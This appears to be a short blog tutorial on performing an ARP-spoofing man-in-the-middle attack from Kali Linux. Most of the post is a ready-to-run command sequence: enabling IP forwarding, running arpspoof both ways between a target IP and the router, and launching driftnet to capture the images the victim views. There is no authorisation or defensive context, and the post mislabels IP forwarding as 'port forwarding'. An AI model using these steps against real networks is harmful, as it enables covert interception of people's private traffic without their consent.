MITM attack

Hello guys today lets see how to perform a simple man in the middle attack using kali linux operating system.

First lets understand what is MITM Attack ?

Man in the middle attack is nothing but an unauthorized person is eavesdropping  to a conversation between two nodes.

mitm

Commends Used on the MITM Attack

sysctl -w net.ipv4.ip_forward=1
arpspoof -i <network_interface> -t <target ip>  <router ip>
arpspoof -i <network_interface> -t <router ip>  <target ip>
driftnet -i <network_interface>
sysctl -w net.ipv4.ip_forward=0

Lets Start the simple MITM Attack,

Open Your Kali Linux operating system and navigate to terminal and identify the following information

  • Your Target IP Address  --                        192.168.0.104
  • Your Router gateway Address                  192.168.0.1
  • Identify your network interface                 wlan0

[Note]: To perform this attack you and your attacker must be connected in the same network.

First Step:

sysctl -w net.ipv4.ip_forward=1

This command is used to do the port forwarding to start the MITM attack.

Second Step:

Here we are making the kali linux to intercept the communication between the

Router and the Target

arpspoof -i <network_interface> -t <target ip>  <router ip>

Example

arpspoof -i wlan0 -t 192.168.0.104 192.168.0.1

Third Step:

Continuity of interception process

arpspoof -i <network_interface> -t <router ip>  <target ip>

Example

arpspoof -i wlan0 -t 192.168.0.1 192.168.0.104

 

Fourth Step:

Lets start the driftnet tool to intercept the images which is being browsed on attacker web browser

 

driftnet -i <network_interface>

Example

driftnet -i wlan0

After this command the driftnet GUI window will open and you can see the images are being intercepted.

Fifth Step:

After this process most importantly disable the portforwarding process.

sysctl -w net.ipv4.ip_forward=0

 

 

Posted by ashokkumar

Leave a Reply